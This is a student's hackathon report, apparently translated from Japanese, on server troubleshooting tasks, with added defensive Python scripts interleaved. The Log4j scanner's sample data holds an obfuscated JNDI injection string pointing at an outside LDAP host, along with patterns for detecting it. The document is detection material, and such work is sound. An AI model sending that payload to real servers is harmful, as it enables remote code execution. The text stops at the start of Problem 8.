GW 🎉 DevSecOpsThon at GMO kitaQ
Day 1 of the GW blog relay is a hackathon participation report.
==============================
On April 29 and 30 I took part in "DevSecOpsThon at GMO kitaQ", an internet-infrastructure hackathon for students supported by Kitakyushu City.
Event details
"DevSecOpsThon" is a contest in which participants learn DevSecOps, the fusion of the three elements development, security and operation, while cooperating as a team to take on specific challenges.
What characterises GMO's DevSecOpsThon is that the content centres on server construction and operation, and that the event is held for students.
Compared with last year the content has been upgraded and the schedule condensed into two days.
For more details see the link below...
(URL: https://www.gmo.jp/news/article/8272/)
Table of contents
Day 1
Problem 1
Problem 2
Problem 3
Problem 4
Problem 5
Problem 6
Problem 7
Day 2
Problem 8
Problem 9
Problem 10
Afterword (Atogaki)
Report
Day 1
1. Problem 1
Problem
To confirm that the website of "a certain company" (とある会社), published on the internet, is running normally, we want to fetch the content of the external web server from the Linux monitoring server we were given.
From the command line, as shown below, the curl command was used to fetch the content over HTTP; it was piped to the xmllint command to parse the HTML and extract the site title, confirming that the intended site was being displayed normally.
$ title="$(curl -sL http://www.とある.jp | xmllint --html --xpath '/html/head/title/text()' - 2>/dev/null)"
$ echo ${title}
テスト
But something seems off. The expected response is the title of the group's corporate website, "とある会社", yet content from a test stage appears to be displayed instead.
Investigate why a response different from the expected one was returned, and state your estimate.
Based on that estimate, connect to "http[://]www[.]とある[.]jp" with the curl command and obtain the expected correct response, "とある会社".
Solution
The DNS settings pointed at an internal server, so I added Cloudflare DNS (1.1.1.1) to /etc/resolv.conf.
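The "wrong resolver" diagnosis behind Problem 1 can be made systematic. The script below is an added example, not part of the original post: it parses a resolv.conf body, flags the case where every configured nameserver is a private (RFC 1918) address, and asks a chosen resolver directly with a minimal DNS A query so the internal resolver's answer can be compared with a public one such as 1.1.1.1. The hostname www.example.jp and the sample addresses are constructed placeholders.

```python
"""Diagnosing the 'wrong resolver' situation from Problem 1.

Added example, not from the original post. Parses resolv.conf, flags an
all-private resolver list, and queries a specific resolver directly
(bypassing resolv.conf) so answers from two resolvers can be compared.
"""
import ipaddress
import socket
import struct

# Constructed sample: only an internal resolver is configured (the symptom).
SAMPLE_RESOLV_CONF = """\
# Generated by NetworkManager
search corp.internal
nameserver 192.168.144.254
options timeout:2
"""


def parse_nameservers(text):
    """Return the addresses of all 'nameserver' lines in a resolv.conf body."""
    servers = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[0] == "nameserver":
            servers.append(parts[1])
    return servers


def only_private_resolvers(nameservers):
    """True when every resolver is private: a public name may then be answered
    from an internal DNS view, which is what served the test page in the post."""
    return bool(nameservers) and all(
        ipaddress.ip_address(ns).is_private for ns in nameservers)


def build_a_query(name, txid=0x1234):
    """Build a standard recursive DNS query for the A record of `name`."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD flag set
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.strip(".").split(".")) + b"\x00"
    return header + qname + struct.pack(">HH", 1, 1)  # QTYPE=A, QCLASS=IN


def _skip_name(buf, off):
    """Skip a (possibly compressed) domain name starting at offset `off`."""
    while True:
        length = buf[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:  # compression pointer, 2 bytes
            return off + 2
        off += length + 1


def parse_a_records(response):
    """Return the IPv4 addresses in the answer section of a DNS response."""
    _, _, qdcount, ancount, _, _ = struct.unpack(">HHHHHH", response[:12])
    off = 12
    for _ in range(qdcount):
        off = _skip_name(response, off) + 4  # skip QTYPE and QCLASS
    addrs = []
    for _ in range(ancount):
        off = _skip_name(response, off)
        rtype, _, _, rdlen = struct.unpack(">HHIH", response[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:
            addrs.append(socket.inet_ntoa(response[off:off + 4]))
        off += rdlen
    return addrs


def sample_response(name="www.example.jp", addr="203.0.113.10"):
    """Constructed response a resolver might return, used for offline testing."""
    query = build_a_query(name)
    header = struct.pack(">HHHHHH", 0x1234, 0x8180, 1, 1, 0, 0)
    answer = b"\xc0\x0c" + struct.pack(">HHIH", 1, 1, 300, 4) + socket.inet_aton(addr)
    return header + query[12:] + answer


def resolve_with(resolver, name, timeout=3.0):
    """Ask one specific resolver (bypassing resolv.conf) for the A records."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_a_query(name), (resolver, 53))
        data, _ = sock.recvfrom(512)
    return parse_a_records(data)


def diagnose(resolv_conf, name, public_resolver="1.1.1.1"):
    """Compare the configured resolver's answer with a public resolver's answer."""
    servers = parse_nameservers(resolv_conf)
    report = {"resolvers": servers, "only_private": only_private_resolvers(servers)}
    if servers:  # live part: needs network access
        report["internal_answer"] = resolve_with(servers[0], name)
        report["public_answer"] = resolve_with(public_resolver, name)
        report["split_view"] = report["internal_answer"] != report["public_answer"]
    return report


if __name__ == "__main__":
    with open("/etc/resolv.conf") as fh:
        print(diagnose(fh.read(), "www.example.jp"))
```

A differing answer between the internal and the public resolver is the split-view condition the post ran into; appending 1.1.1.1 to resolv.conf works only as long as the internal resolver is not listed first, because glibc tries nameservers in order and falls through only on timeout, not on a wrong answer.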
2. Problem 2
Problem
There are two servers, each assigned an internal IP and a global IP.
However, after several password mistakes, SSH became impossible. Find the cause and resolve it.
- SSH from Aruto (the venue) to q3-[ ]-01 / q3-[ ]-02 is possible.
- SSH from q3-[ ]-01 to q3-[ ]-02 is possible.
- SSH from q3-[ ]-02 to q3-[ ]-01 is not possible.
[SSH possible] Aruto (venue) → q3-[*]-01, Aruto (venue) → q3-[*]-02, q3-[*]-01 → q3-[*]-02. [SSH not possible] q3-[*]-02 → q3-[*]-01
Configuration diagram
Solution
The fail2ban ban was lifted with the following commands.
[root@q3-x-01 ~]# fail2ban-client status sshd
Status for the jail: sshd
|- Filter
| |- Currently failed: 0
| |- Total failed: 9
| `- Journal matches: _SYSTEMD_UNIT=sshd.service + _COMM=sshd
`- Actions
|- Currently banned: 1
|- Total banned: 3
`- Banned IP list: 192.168.144.71
[root@q3-x-01 ~]# fail2ban-client set sshd unbanip 192.168.144.71
[root@q3-x-01 ~]# firewall-cmd --reload
success
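The unban above clears the current ban only; the next run of failed logins from q3-[*]-02 would ban it again. The script below is an added example, not part of the original post: it parses `fail2ban-client status <jail>` output in the shape shown above, reports which banned addresses fall inside trusted networks (venue, peer server), and renders the `ignoreip` setting for jail.local, the standard fail2ban option that exempts those sources. The trusted network 192.168.144.0/24 and the jail.local placement are assumptions.

```python
"""Checking a fail2ban jail for banned *trusted* sources (Problem 2).

Added example, not from the original post. Parses `fail2ban-client status`
output, lists banned addresses that belong to trusted networks, and
renders the lasting fix (ignoreip) next to the one-off fix (unbanip).
"""
import ipaddress
import re
import subprocess

# Constructed sample with the same shape as the post's own status output.
SAMPLE_STATUS = """\
Status for the jail: sshd
|- Filter
|  |- Currently failed: 0
|  |- Total failed:     9
|  `- Journal matches:  _SYSTEMD_UNIT=sshd.service + _COMM=sshd
`- Actions
   |- Currently banned: 1
   |- Total banned:     3
   `- Banned IP list:   192.168.144.71
"""

_FIELD = re.compile(r"-\s*([A-Za-z ]+?):\s*(.*)$")
_COUNTERS = ("Currently failed", "Total failed", "Currently banned", "Total banned")


def parse_status(text):
    """Return the counters and the list of currently banned addresses."""
    info = {"banned_ips": []}
    for line in text.splitlines():
        m = _FIELD.search(line)
        if not m:
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Banned IP list":
            info["banned_ips"] = value.split()
        elif key in _COUNTERS:
            info[key] = int(value)
    return info


def trusted_but_banned(info, trusted_networks):
    """Banned addresses that belong to a trusted network (venue, peer server)."""
    nets = [ipaddress.ip_network(n, strict=False) for n in trusted_networks]
    return [ip for ip in info["banned_ips"]
            if any(ipaddress.ip_address(ip) in net for net in nets)]


def ignoreip_fragment(trusted_networks, jail="sshd"):
    """jail.local fragment: 'ignoreip' exempts sources from banning
    (loopback kept, as in the default configuration)."""
    return f"[{jail}]\nignoreip = 127.0.0.1/8 ::1 {' '.join(trusted_networks)}\n"


def unban_commands(addresses, jail="sshd"):
    """The one-off fix from the post, one command per banned trusted address."""
    return [f"fail2ban-client set {jail} unbanip {ip}" for ip in addresses]


def live_report(jail="sshd", trusted_networks=("192.168.144.0/24",)):
    """Run against the real fail2ban socket (needs root); returns the report."""
    out = subprocess.run(["fail2ban-client", "status", jail],
                         capture_output=True, text=True, check=True).stdout
    info = parse_status(out)
    wrongly = trusted_but_banned(info, trusted_networks)
    return {"banned": info["banned_ips"], "trusted_banned": wrongly,
            "unban": unban_commands(wrongly, jail),
            "jail_local": ignoreip_fragment(trusted_networks, jail)}


if __name__ == "__main__":
    print(live_report())
```

Whether to exempt the peer server at all is a judgement call: `ignoreip` also exempts it from detection of a real compromise, so a narrower alternative is to keep the jail and raise `maxretry` for the internal network only.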
3. Problem 3
Problem
We are building a web server and a DB server to run WordPress.
Each server has a global and an internal IP, and for security the database is to be configured so that it accepts connections only from the internal network.
Work on both the web server and the DB server is half done, and the engineer building them has suddenly disappeared. Complete the remaining configuration so that the WordPress initial screen can be displayed.
Configuration information
The OS is Ubuntu 22.04.
| HOSTNAME | GLOBAL-IP | INTERNAL-IP | USER-ID | USER-PASS |
|---|---|---|---|---|
| q1--web | 1++.++.++.+ | 192.168.144.* | root | notified individually |
| q1--db | 1++.++.++.* | 192.168.144.* | root | notified individually |
Web server work summary
- apache installed
- php installed
- WordPress package extracted under /var/www/html
- DB connection information set in the config file
DB server work summary
- mariadb installed
- database for WordPress created
- DB user for WordPress created
Configuration diagram
Solution
We were handed the two servers, DB and Web. The person in charge had apparently disappeared.
Web
- Opening ports
[root@q3-a-01 ~]# firewall-cmd --reload
$ ufw allow 80/tcp
$ ufw allow 3306
$ ufw reload
- IP address configuration
vim /etc/network/interfaces
and add the following:
auto eth1
iface eth1 inet static
address 192.168.144.41
netmask 255.255.255.0
Then bring the interface up:
$ ip link set eth1 up
- WordPress configuration
I followed the configuration below.
Install and configure Wordpress
wordpress.conf
root@q1-a-web:~# cat /etc/apache2/sites-available/wordpress.conf
<VirtualHost *:80>
DocumentRoot /var/www/html
<Directory /var/www/html>
Options FollowSymLinks
AllowOverride Limit Options FileInfo
DirectoryIndex index.php
Require all granted
</Directory>
<Directory /var/www/html/wp-content>
Options FollowSymLinks
Require all granted
</Directory>
</VirtualHost>
root@q1-a-web:~#
DB
- Opening the port
$ ufw allow 3306
$ ufw reload
- Filtering connection source IPs with ufw
$ ufw allow from 192.168.144.0/24 to any port 3306
$ ufw reload
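One point worth checking after the steps above: `ufw allow 3306` on the DB host admits any source, and the later subnet rule does not replace it; ufw keeps both, so the requirement "reachable from the internal network only" is not yet met. The script below is an added example, not part of the original post: it parses `ufw status` output, flags rules that expose the DB port to "Anywhere" or to a source outside the allowed networks, and prints the commands that correct it. The sample status text is constructed to match the rule set the post's commands would produce.

```python
"""Auditing the ufw rule set for an internal-only database port (Problem 3).

Added example, not from the original post. Flags ALLOW rules for the DB
port whose source is outside the allowed networks and prints the fix.
"""
import re
import subprocess

# Constructed `ufw status` output for the DB host after the post's commands.
SAMPLE_UFW_STATUS = """\
Status: active

To                         Action      From
--                         ------      ----
22/tcp                     ALLOW       Anywhere
3306                       ALLOW       Anywhere
3306                       ALLOW       192.168.144.0/24
22/tcp (v6)                ALLOW       Anywhere (v6)
3306 (v6)                  ALLOW       Anywhere (v6)
"""


def parse_ufw_status(text):
    """Return the rule table as a list of {to, action, from} dicts."""
    rules, in_table = [], False
    for line in text.splitlines():
        if line.startswith("--"):
            in_table = True
            continue
        if not in_table or not line.strip():
            continue
        cols = re.split(r"\s{2,}", line.strip())
        if len(cols) == 3:
            rules.append({"to": cols[0], "action": cols[1], "from": cols[2]})
    return rules


def _port_of(to_field):
    """'3306', '3306/tcp', '3306 (v6)' -> '3306'."""
    return to_field.split()[0].split("/")[0]


def exposed_rules(rules, port, allowed_sources):
    """ALLOW rules for `port` whose source is not one of the allowed networks."""
    return [r for r in rules
            if r["action"] == "ALLOW" and _port_of(r["to"]) == str(port)
            and r["from"] not in allowed_sources]


def fix_commands(rules, port, allowed_sources):
    """Commands that remove the open rules and keep only the subnet rules.
    `ufw delete allow <port>` removes both the IPv4 and the IPv6 rule that
    `ufw allow <port>` created, so one delete covers an 'Anywhere' pair."""
    exposed = exposed_rules(rules, port, allowed_sources)
    present = {r["from"] for r in rules
               if r["action"] == "ALLOW" and _port_of(r["to"]) == str(port)}
    cmds = []
    if any(r["from"].startswith("Anywhere") for r in exposed):
        cmds.append(f"ufw delete allow {port}")
    for r in exposed:
        if not r["from"].startswith("Anywhere"):
            cmds.append(f"ufw delete allow from {r['from']} to any port {port}")
    for net in allowed_sources:
        if net not in present:
            cmds.append(f"ufw allow from {net} to any port {port}")
    return cmds


def audit_live(port=3306, allowed_sources=("192.168.144.0/24",)):
    """Audit the running host (needs root for `ufw status`)."""
    out = subprocess.run(["ufw", "status"], capture_output=True,
                         text=True, check=True).stdout
    rules = parse_ufw_status(out)
    return exposed_rules(rules, port, allowed_sources), fix_commands(rules, port, list(allowed_sources))


if __name__ == "__main__":
    print(audit_live())
```

As a second layer, MariaDB's own `bind-address` can be set to the DB host's internal address so the server does not listen on the global interface at all, and the WordPress DB user can be created as `'wp'@'192.168.144.%'` rather than `'wp'@'%'`. The web host, for its part, does not need port 3306 open at all: it is a client of the DB, not a server.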
4. Problem 4
Problem
There are two servers, each with both an internal and a global IP.
One is used as a web server.
On the other, a monitoring server is being built so that the load on the web server can be monitored.
The engineer building the servers has suddenly disappeared, and the essential monitoring settings have not been made.
As things stand we cannot tell whether the service is running normally.
Urgently configure the monitoring items below.
:::info
The order in which you configure the monitors does not matter!
The whole team may work on one monitor together, or you may split the work within the team!
Try to get all of the monitors configured!
:::
List of monitoring settings
1. Liveness monitoring
Perform liveness (ping) monitoring of the web server every 10 seconds.
If it is unreachable 5 times in a row, an alert must appear in the ZABBIX console in the browser.
Once the alert is visible on the dashboard or the Problems tab of the ZABBIX console in the browser, report it together with a screenshot.
:::tip
Hint: Simple check
:::
2. Memory performance monitoring
Monitor the memory utilisation of the web server.
If utilisation exceeds 80%, an alert must appear in the ZABBIX console in the browser.
Once the alert is visible on the dashboard or the Problems tab of the ZABBIX console in the browser, report it together with a screenshot.
:::tip
Hint: requires zabbix-agent configuration
:::
3. CPU performance monitoring
Monitor the CPU utilisation of the web server.
If utilisation exceeds 80%, an alert must appear in the ZABBIX console in the browser.
Once the alert is visible on the dashboard or the Problems tab of the ZABBIX console in the browser, report it together with a screenshot.
:::tip
Hint: requires zabbix-agent configuration
:::
4. Network performance monitoring
Monitor the network traffic on the web server every 10 seconds.
If inbound or outbound utilisation is 50% or more for 6 or more consecutive checks, an alert must appear in the ZABBIX console in the browser.
Once the alert is visible on the dashboard or the Problems tab of the ZABBIX console in the browser, report it together with a screenshot.
:::tip
Hint: requires zabbix-agent configuration
:::
5. Service monitoring
Monitor the running state of the nginx service on the web server.
If the service is not running, an alert must appear in the ZABBIX console in the browser.
Once the alert is visible on the dashboard or the Problems tab of the ZABBIX console in the browser, report it together with a screenshot.
:::tip
Hint: requires zabbix-agent configuration
:::
6. Web page response time monitoring 1
Using the Zabbix web scenario feature, monitor the load time of the web page "http[://]<web server IP>".
If the load time exceeds 1 second, an alert must appear in the ZABBIX console in the browser.
Once the alert is visible on the dashboard or the Problems tab of the ZABBIX console in the browser, report it together with a screenshot.
:::tip
Hint: web scenario
:::
7. Web page response time monitoring 2 (with redirect)
Using the Zabbix web scenario feature, monitor the load time of the redirecting web page "http[://]<web server IP>:50080".
If the load time exceeds 1 second, an alert must appear in the ZABBIX console in the browser.
Once the alert is visible on the dashboard or the Problems tab of the ZABBIX console in the browser, report it together with a screenshot.
:::tip
Hint: only a small difference from 6
:::
8. SSH log monitoring on the server
Monitor the SSH log of the web server.
If an authentication-failure log entry appears, an alert must appear in the ZABBIX console in the browser.
Once the alert is visible on the dashboard or the Problems tab of the ZABBIX console in the browser, report it together with a screenshot.
:::tip
Hint: Active Check
:::
9. Alert notification 1: e-mail
Send an e-mail when an alert on the web server is detected.
The sender and recipient addresses are as follows.
Mail server: 192.168.144.254
From: team-X@devsecopsthon.*
To: tema-atruto@+++.*
:::tip
Hint: user media
:::
10. Alert notification 2: Slack
Output an alert message to Slack when an alert is detected.
:::tip
Hint: Slack-API
:::
Solution
zabbix_agent would not come back for several minutes.
The wired network was unstable, and the triggers flapped every few minutes.
We could not solve one of the sub-items of Task 4 (number 2).
I want to reproduce this environment on my home server.
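The flapping the solution describes is also a trigger-design question: a liveness trigger that fires on the last sample alone raises an alert on every lost packet, while the task's "5 consecutive failures" condition maps to Zabbix's `#N` window functions. The script below is an added example, not from the post or from Zabbix itself: it re-implements the `last()`, `max(#N)` and `min(#N)` arithmetic over constructed sample series so the task's thresholds can be checked before they are typed into the server. The expression strings follow Zabbix 6.x syntax with standard item keys; the host name "q4-web", the interface name eth0 and the 100 Mbit/s link speed are assumptions.

```python
"""Modelling the Problem 4 trigger conditions over sample data.

Added example, not from the original post or from Zabbix. Re-implements
the window arithmetic of Zabbix trigger functions and compares a
last()-based with a max(#N)-based liveness trigger on a flapping link.
"""

LINK_BYTES_PER_S = 100_000_000 // 8  # assumed 100 Mbit/s link, in bytes/s

# Constructed samples, oldest first. icmpping: 1 = reachable, 0 = unreachable.
SAMPLES = {
    "icmpping": [1, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0],      # ends with 5 failures
    "vm.memory.size[pused]": [70.2, 84.5],            # percent used
    "system.cpu.util[,idle]": [88.0, 55.0, 70.0],     # percent idle
    "net.if.in[eth0]": [7_000_000] * 6,               # bytes/s, 6 samples
    "net.if.out[eth0]": [7_000_000] * 5 + [1_000],    # drops on last sample
    "proc.num[nginx]": [2, 0],                        # nginx processes
}

# Trigger expressions the samples are checked against (Zabbix 6.x syntax).
EXPRESSIONS = {
    "ping_down_5x": "max(/q4-web/icmpping,#5)=0",
    "memory_gt_80": "last(/q4-web/vm.memory.size[pused])>80",
    "cpu_gt_80":    "100-last(/q4-web/system.cpu.util[,idle])>80",
    "net_in_6x":    f"min(/q4-web/net.if.in[eth0],#6)>{LINK_BYTES_PER_S // 2}",
    "net_out_6x":   f"min(/q4-web/net.if.out[eth0],#6)>{LINK_BYTES_PER_S // 2}",
    "nginx_down":   "last(/q4-web/proc.num[nginx])=0",
}


def last_n(values, n):
    """The last n values, or None when fewer than n samples exist (a trigger
    with insufficient history is not evaluable)."""
    return values[-n:] if len(values) >= n else None


def fn_max(values, n):
    w = last_n(values, n)
    return None if w is None else max(w)


def fn_min(values, n):
    w = last_n(values, n)
    return None if w is None else min(w)


def fn_last(values):
    return values[-1] if values else None


def evaluate(samples):
    """Return {trigger name: True if it would fire on these samples}."""
    half = LINK_BYTES_PER_S // 2
    idle = fn_last(samples["system.cpu.util[,idle]"])
    return {
        "ping_down_5x": fn_max(samples["icmpping"], 5) == 0,
        "memory_gt_80": (fn_last(samples["vm.memory.size[pused]"]) or 0) > 80,
        "cpu_gt_80": idle is not None and 100 - idle > 80,
        "net_in_6x": (fn_min(samples["net.if.in[eth0]"], 6) or 0) > half,
        "net_out_6x": (fn_min(samples["net.if.out[eth0]"], 6) or 0) > half,
        "nginx_down": fn_last(samples["proc.num[nginx]"]) == 0,
    }


def flap_comparison(series, n=5):
    """How often 'last()=0' versus 'max(#n)=0' would fire on a flapping
    series: the #n form keeps an unstable link (the situation the post
    describes) from raising an alert on every single lost packet."""
    last_fires = sum(1 for v in series if v == 0)
    window_fires = sum(1 for i in range(n, len(series) + 1)
                       if max(series[i - n:i]) == 0)
    return {"last_eq_0": last_fires, f"max_{n}_eq_0": window_fires}


if __name__ == "__main__":
    for name, fired in evaluate(SAMPLES).items():
        print(f"{'FIRE' if fired else '  ok'}  {EXPRESSIONS[name]}")
    print(flap_comparison([1, 0, 1, 0, 1, 0, 1, 1, 0, 1]))
```

The network items assume the "Change per second" preprocessing step on `net.if.in`/`net.if.out`, so the values are bytes per second; with a 10-second item interval, `#6` covers the one-minute window the task asks for.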
5. Problem 5
Problem
Unauthorised access attempts were made against the WordPress login page.
To improve security, identify the accesses in question and take countermeasures!
Block every IP that appears malicious, without affecting legitimate access, and report!
Work environment
OS: Ubuntu 20.04.3 LTS
The following are installed
nginx version: nginx/1.23.4
wordpress-6.2
php 7.4
mysql Ver 15.1 Distrib 10.3.38-MariaDB
Solution
Legitimate IPs:
+++.++.+.18,
+++.++.+.55,
+++.++.+.238
Attacking IPs:
+++.++.*.0/24 other than the above
- The attacker used a fixed ID and changed the password on every request.
- The attacker's user agent differed on every request, which is suspicious.
- Legitimate accesses used the shared ID/password.
Personal impressions
With 500 requests in 2 seconds, I felt that doing it by hand was the quickest way.
Just analysing the access log probably already reveals the differences between the legitimate and the attacking IPs.
Also, the point "legitimate accesses use the shared ID/password" impressed me: so that is what you look at to decide. A lesson learned.
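The two tells in the solution, a burst of login POSTs and a user agent that changes on every request, can be scored directly from the nginx access log instead of by eye. The script below is an added example, not part of the original post: it parses "combined" format lines, counts POSTs to wp-login.php per source inside a sliding window, counts distinct user agents per source, and prints ufw deny commands for the flagged addresses while never blocking an allow-listed one. The log lines and addresses are constructed for the example.

```python
"""Separating brute-force sources from legitimate logins in an nginx access
log (Problem 5).

Added example, not from the original post. Scores each source address on
login-POST rate and user-agent churn, then emits block commands.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def _line(ip, when, method, path, status, ua):
    stamp = when.strftime(TS_FMT)
    return f'{ip} - - [{stamp}] "{method} {path} HTTP/1.1" {status} 2345 "-" "{ua}"'


def build_sample_log():
    """Constructed log: one legitimate user retrying twice, and one source
    sending 40 login POSTs in 2 seconds with a different user agent each time."""
    t0 = datetime.strptime("29/Apr/2023:10:15:00 +0900", TS_FMT)
    browser = "Mozilla/5.0 (X11; Linux x86_64) Firefox/112.0"
    lines = []
    for i in range(3):
        lines.append(_line("192.0.2.18", t0 + timedelta(seconds=40 * i), "POST",
                           "/wp-login.php", 302, browser))
        lines.append(_line("192.0.2.18", t0 + timedelta(seconds=40 * i + 1), "GET",
                           "/wp-admin/", 200, browser))
    for i in range(40):
        lines.append(_line("198.51.100.77", t0 + timedelta(seconds=i // 20), "POST",
                           "/wp-login.php", 200, f"Mozilla/5.0 (compatible; agent-{i})"))
    return lines


def _peak_in_window(times, window):
    """Largest number of events inside any `window` (two-pointer sweep)."""
    times = sorted(times)
    peak = start = 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        peak = max(peak, end - start + 1)
    return peak


def analyze(lines, window_s=60, max_posts=10, max_agents=5):
    """Return {ip: [reasons]} for sources that look like credential guessing."""
    per_ip = defaultdict(lambda: {"times": [], "agents": set()})
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or not m["path"].startswith("/wp-login.php"):
            continue
        rec = per_ip[m["ip"]]
        rec["times"].append(datetime.strptime(m["ts"], TS_FMT))
        rec["agents"].add(m["ua"])
    flagged = {}
    for ip, rec in per_ip.items():
        reasons = []
        peak = _peak_in_window(rec["times"], timedelta(seconds=window_s))
        if peak > max_posts:
            reasons.append(f"{peak} login POSTs within {window_s}s")
        if len(rec["agents"]) > max_agents:
            reasons.append(f"{len(rec['agents'])} distinct user agents")
        if reasons:
            flagged[ip] = reasons
    return flagged


def block_commands(flagged, allowlist=()):
    """ufw deny rules, inserted at position 1 so they precede the allow rules
    (ufw is first-match); allow-listed addresses are never blocked."""
    return [f"ufw insert 1 deny from {ip}" for ip in sorted(flagged) if ip not in allowlist]


if __name__ == "__main__":
    hits = analyze(build_sample_log())
    for ip, why in hits.items():
        print(ip, "->", "; ".join(why))
    print("\n".join(block_commands(hits, allowlist={"192.0.2.18"})))
```

The allow-list is the safeguard the task asks for ("without affecting legitimate access"); the three legitimate addresses from the solution would go there. For an ongoing guard rather than a one-off clean-up, the same two signals translate into a fail2ban filter on `POST /wp-login.php` with a low `maxretry`.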
6. Problem 6
Problem
We have been asked to take over a WordPress site migrated from another system.
However, in its current state it has not been tuned, so we were asked to tune it.
Tune it so that it returns correct responses to as many requests as possible. Requests go not only to the site's top page but also to each individual article.
Measurements are taken 4 times in total.
For the first one, check the current state of the site.
After that there are 2 intermediate measurements and a final measurement.
During a measurement, if failed requests such as connection errors reach 10% or more, or responses taking over 3 seconds reach 5% or more, the measurement stops automatically.
Solution
Our team fiddled with the php-fpm settings in various ways.
The result was...
an astonishing 0 points.
I have not finished experimenting, so I want to build the same environment on my home server and fully reproduce it.
I want to understand nginx's feelings better.
Organiser's answer
Please refer to the following, among others.
https://qiita.com/mikene_koko/items/85fbe6a342f89bf53e89
The following files had been changed from their default values.
/etc/nginx/nginx.conf
events {
worker_connections 1024;
}
→
worker_processes 1;
worker_rlimit_nofile 30;
events {
worker_connections 40;
}
keepalive_timeout 65;
→
keepalive_timeout 0;
/usr/lib/systemd/system/nginx.service
LimitNOFILE=24 was added
/etc/php/7.4/fpm/php-fpm.conf
process.max = 2
→
process.max = 1
/etc/php/7.4/fpm/pool.d/www.conf
pm.max_requests = 10 was added
Supplement
In situations where it is known that the content is not updated, MySQL's query cache and fastcgi_cache are highly effective.
7. Problem 7
※ WARNING
This content is written for the purpose of sharing security knowledge widely and does not encourage attacks such as the exploitation of vulnerabilities. Attacking hosts without permission may be a crime. The author accepts no responsibility for actions taken by referring to or imitating the information described here.
Problem
Omitted
Task details
On December 5, 2021 it was announced that a vulnerability had been found in Apache Log4j, a Java logging library.
The vulnerability allows a remote third party to execute arbitrary code or commands by sending crafted data, and it was given the maximum severity score of 10.0.
As you all know, Java is a famous programming language; some of you may remember the catchphrase "Java runs on 3 billion devices". Systems fundamentally output logs, so a vulnerability in such a basic feature of such a well-known language had a very large impact. The US government convened multiple IT companies for a meeting, NHK reported on it, and it became a topic worldwide.
The reason this Apache Log4j vulnerability drew so much attention was of course its high severity score (CVSS) and the fact that it was in widely used OSS, but also that exploitation was comparatively easy. Let's look in a little more detail at how an attack is possible.
Log4j implements a Lookup feature that evaluates parts of a logged string as variables. This vulnerability abuses one of those features, the JNDI Lookup. A web server, for example, may write the method, host and headers of an HTTP request to its log; a Java class file referenced by an external URL or internal path contained in that log entry would then be fetched (deserialised) and executed.
Examples of abuse using this vulnerability include ransomware infection, deployment of cryptocurrency-mining malware, and theft of confidential information.
Solution
Task 6
- I seem to have got part of the way through this sub-problem, but since a teammate solved it I am not certain.
2. The CVE identifier of the vulnerability discussed here
CVE-2021-44228
- Affected version range of the vulnerability (version numbers)
Apache Log4j-core 2.x versions earlier than 2.15.0
- Three services or companies affected by the discovery of the vulnerability in this software
(Example)
- Service / company name (including source URL)
- VMware / VMware, Inc
(https://www.vmware.com/security/advisories/VMSA-2021-0028.html)
- Java Edition / MINECRAFT
(https://www.minecraft.net/ja-jp/article/important-message--security-vulnerability-java-edition-jp)
- Oracle Cloud / Oracle
(https://www.oracle.com/security-alerts/alert-cve-2021-44228.html#Appendix3RD)
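Two defender-side checks follow from the task text: request logs can be searched for the `${jndi:` lookup string the vulnerability abuses (including the nested-lookup spellings that public detection rules normalise before matching), and deployed jar names can be compared with the affected range stated above, 2.x earlier than 2.15.0. The script below is an added example, not part of the original post; the sample log lines and jar names are constructed.

```python
"""Spotting JNDI lookup strings in logs and out-of-date log4j-core jars
(Problem 7).

Added example, not from the original post. Normalises nested Log4j
lookups before matching and checks jar versions against the post's range.
"""
import re

_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")


def normalize(text):
    """Resolve ${lower:x}, ${upper:x} and ${...:-x} lookups until nothing
    changes, so '${${lower:j}ndi:' collapses to '${jndi:'."""
    prev = None
    while prev != text:
        prev = text
        text = _CASE.sub(lambda m: m.group(2).lower() if m.group(1).lower() == "lower"
                         else m.group(2).upper(), text)
        text = _DEFAULT.sub(lambda m: m.group(1), text)
    return text


def has_jndi_lookup(line):
    return "${jndi:" in normalize(line).lower()


def scan_log(lines):
    """Return the (1-based) line numbers containing a JNDI lookup string."""
    return [i for i, line in enumerate(lines, 1) if has_jndi_lookup(line)]


_JAR = re.compile(r"log4j-core-(\d+)\.(\d+)\.(\d+)\.jar$")


def vulnerable_jars(jar_names, fixed=(2, 15, 0)):
    """log4j-core jars in the 2.x range below the fix version from the post."""
    hits = []
    for name in jar_names:
        m = _JAR.search(name)
        if m:
            version = tuple(int(x) for x in m.groups())
            if version[0] == 2 and version < fixed:
                hits.append(name)
    return hits


# Constructed samples: two request log lines and a deployment's jar list.
SAMPLE_LOG = [
    '203.0.113.9 - - [09/Dec/2021:23:59:01 +0900] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [09/Dec/2021:23:59:02 +0900] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:ldap://203.0.113.9/a}"',
]
SAMPLE_JARS = ["lib/log4j-api-2.14.1.jar", "lib/log4j-core-2.14.1.jar",
               "lib/log4j-core-2.15.0.jar"]

if __name__ == "__main__":
    print("suspicious log lines:", scan_log(SAMPLE_LOG))
    print("jars to update:", vulnerable_jars(SAMPLE_JARS))
```

Log scanning tells you whether anyone probed an application; the jar check tells you whether the probe could have mattered. A hit on the second without the first is still a patching priority, since the log only shows the fields this server happened to record.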
Day 2
8. Problem 8
Problem
Task description
You are running WordPress on a VM.
